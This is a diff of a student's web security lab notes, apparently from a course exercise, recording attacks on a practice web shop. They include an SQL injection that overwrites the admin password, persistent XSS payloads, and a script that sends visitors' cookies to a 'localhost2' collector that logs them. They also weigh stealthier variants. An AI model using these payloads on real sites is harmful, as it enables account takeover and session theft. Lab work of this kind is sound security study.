rasmusolofzon/sec_of_a_spider/lab/prep_and_notes.md

 	* Abuse change password feature?

 ## Problem 4
+* Failing when old=[OLD] and new= `" ;`
+	* output: `query: UPDATE users SET password="" ;" WHERE username="2" failed`
+* Working injection: `adminpass" WHERE username="admin" #`
+* **Logged in!**

 ## Problem 5
 * Abilities of admin account vs normal account
+	* Can add new items
+	* Can remove all items

+* Attack vectors
+	* Can probably do persistent XSS

+---

 ## Problem 6
+* XSS vulnerability: adding items to shop as admin
+	* Used script from prep-ass.
+3.
+	Output: `Query: INSERT INTO items SET name="xsstest;`
+	* Used `<script>alert("xss")</script>`
+	Got an alert!
+	Output: `Query: INSERT INTO items SET name="" failed` This does not, however, matter since the vulnerability was proved.
+	..Actually, that was just a vector for reflective XSS, not persistent.
+	* Next try: `xss <script>alert('xss')</script>`
+	This worked.
+An `xss` element was added to Shop, and when Shop page is accessed the alert is triggered.
+	Persistent.
+Nice.
+* Modified script/entry to Shop page:
+	`it's a steal! <script>document.location='http://localhost2/index.php?cookie='
+	` + document.cookie</script>`
+	Had to remove semicolon because that would end SQL query.
+* The script works by changing location of the DOM to our malicious site.
+That site's php script saves the cookie attached in the GET request, to a file named log.txt.
+It then changes the header to the referer, in this case the webshop site.
+This does not result in any noteworthy stealthiness, especially since the two sites keep referring to eachother, throwing the user agent back and forth like a quick game of Pong.
+The user has a hard time clicking anything because of these.
+Even as attacker, to remove the item one had to actively stop loading the site, and then click the Delete All button.

+---

 ## Problem 7
+* Explanation of scripts:
+	* The first one is explained in Prob.
+6.
+	* The second is a link (\<a> element) that refers to google.com, but at mouseover executes the same Javascript as the first variant.
+	* The third instantiates an Image, w/ the source same as the first two variants refer to.
+The difference here is that this will neither put user in an eternal loop or require interaction w/ the element from the user, but execute unseen.
+	Thus, stealthiness.
+* Which works best?
+	* Partial explanation in bullet point above.
+	* Circumstances:
+		* 1: If there is no need to be covert, or if not being covert is the desired effect.
+		E. g. letting somebody know you have control over at least part of their system to scare or blackmail them.
+Or attacking an automatic system of some sort.

 ## Problem 8
 ## Problem 9
 ## Problem 10